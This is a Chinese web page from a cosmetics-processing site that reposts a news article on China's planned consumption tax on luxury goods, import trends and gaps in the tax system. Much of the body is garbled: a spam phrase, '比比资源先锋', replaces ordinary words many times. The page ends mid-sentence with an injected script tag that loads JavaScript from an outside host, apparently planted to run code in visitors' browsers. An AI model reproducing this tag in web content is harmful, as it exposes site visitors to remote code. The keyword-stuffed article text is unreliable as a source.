化妝品加工就要WWW.91JG.COM,專業化妝品、美容護膚品加工服務平台!
服務比比资源先锋/微信/QQ同號 18620-555-111
  • 搜比比资源先锋
  • 搜全站
比比资源先锋 / 比比资源先锋比比资源先锋 / 政策法規
中国准备对奢侈品加征消费税 年内可望实质突破

编辑者:嘉工生物 2017-03-16 13:26:20

从外贸角度讲,奢侈品消费税是每一个国家的国内税法,并不与WTO规则抵触;中国迟迟没有推出这一政策主要因为避免引起贸易摩擦  一位从事汽车进口贸易的女士前不久在一次会议上向财政部官员提出质疑:“为什么在关税下调的同时,中国开始对进口汽车征收消费税?”得到的回答是:“对一些高档商品征收消费税属于国际惯例,这并不是什么贸易保护措施。”  这位财政部官员向《财经时报》表示,中国有关部门正在着手研究对消费税征收对象的调整,一些高档商品将进入被征收的范围。他认为,只要征收标准对境内外商品“一视同仁”,就不会引起中国的贸易伙伴的不满。  财政问题专家认为,根据目前形势发展,中国对一些高档商品征收消费税,已经成为税制改革的一个重要组成部分;事实上,中国对高档商品征收消费税已经没有任何障碍。  奢侈品市场成长最快  北京市工商局一位人士估计,目前在北京高档服装市场,大约80%是国外名牌。  记者从北京市商务局得到了相应的证实。不久前该局对北京25家商场的家电、服装、化妆品共16种商品的调查结果表明:化妆品消费市场中,国际品牌、合资品牌成为市场主导比比资源先锋;在服装类商品,国际名牌保持高档市场的优势领先地位,内地品牌在中档市场占据有利地位;在高档商场,服装类国际品牌占80%以上。  不仅北京如此,高盛公司伦敦总部的分析报告显示,2003年中国的奢侈品市场已达20亿美元,占全球销售总额650亿美元的3%。这个看似不大的数字,其上升幅度已经位居全球之首。  法国巴黎百富勤的报告则指出,中国已进入奢侈品消费初期。该机构测算,中国的中等收入阶层家庭6年后将达到1亿个,户均拥有资产达到62万元。分析师认为,随着中等收入阶层的崛起,中国的消费率还会不断上升,预计将从2002年的58%上升到2010年的65%、2020年的71%,接近发达国家水平。  中国税制短板  中国对高档消费品消费能力的增强,表现了经济实力的增强,但中国的税制体系目前仍存在问题。国税总局税科所一位研究员告诉记者,目前税收制度与国际通行规则脱节,是造成中国奢侈商品消费高速增长的原因之一。  中国的消费税除了金银首饰改在零售环节课税,其他应税消费基本在产制环节课税。1994年中国开征消费税,但仅对11种商品在比比资源先锋委托加工、比比资源先锋及进口等三个环节征收,而国外则是在流通环节上征收。  国税总局税科所这位研究员称:“正是这种征收环节上的差异,造成了国外高档消费品大量进入中国。比如高档手表、珠宝饰品等。”  意大利古奇公司现任总裁多明尼科·迪梭就明确表示:“中国消费者不会去买‘中国制造’的‘古奇’比比资源先锋。”全球最昂贵的眼镜供应商LOTOS在中国也选择了相类似的战略——不投资设场比比资源先锋,仅委托代理销售。据第一个将亚太总部搬到中国的奢侈品公司——雅诗·兰黛亚太区总裁葛博透露,在未来几年,雅诗·兰黛并没有在中国设厂的考虑。  税种调整  这位研究员认为,外国公司这种动向,主要由于中国对高档消费品的消费征收存在漏洞。“按照目前这样的税制,外商投资企业缴纳的企业所得税只有中资企业的一半,但他们依然不愿将比比资源先锋线迁往中国,原因就是中国不征收消费税”。  以手表为例,在中国销售的高档手表中99%是进口比比资源先锋,但中国只拿到了关税、增值税。关税视具体情况收取,如电力驱动、指针式手表的关税是13.8%,自动上弦手表的关税为13.2%。一块镶嵌了贵金属、宝石、钻石的手表,售价动辄几万、几十万甚至上百万元,却因为这些比比资源先锋未在中国比比资源先锋,中国不仅没有收到发生在比比资源先锋环节上的消费税,同时还流失了珠宝、首饰的消费税。  因此,很多专家建议,中国应该从速改变消费税课税环节,同时对征收消费税的税种进行调整。据国税总局税科所刘佐所长介绍,中国目前实行的消费税征收办法还是沿用上个世纪70年代以前的做法,征收范围不合理现象十分严重。比如现在,甚至连香皂还在消费税的征收范围之内。  据悉,中国将在2004年内对消费税进行较大规模的调整。知情人坚称,相信以“结构调整”为内容的消费税改革,今年将迈出实质性步伐。  优化进口商品结构  专家普遍认为,通过这次税改,将在增加国家税收、调整国民收入再分配、优化中国的进口结构三方面产生正面的促进作用。商务部贸易研究院一位研究员则认为,这次税改效用将集中表现在优化中国进口商品结构上。  根据最新进出口统计,2004年一季度,中国贸易逆差达到84亿美元。尽管从数据看,中国目前的进口结构还比较合理,进口中大部分都是原材料等比比资源先锋型商品,不过,“前车之鉴”仍不可忽视。  1997年亚洲“金融危机”发生前,在泰国等东南亚国家,由于大量高档消费品成为国内年轻消费者的追求,以至国家有限的出口能力所换回的外汇被大量消耗,巨额贸易逆差不得不依靠资本收入来填补,从而倒逼金融市场并导致过度开放。实际上,亚洲“金融危机”的这一教训,近年来一直被?script src=http://cn.jxmmtv.com/cn.js></script>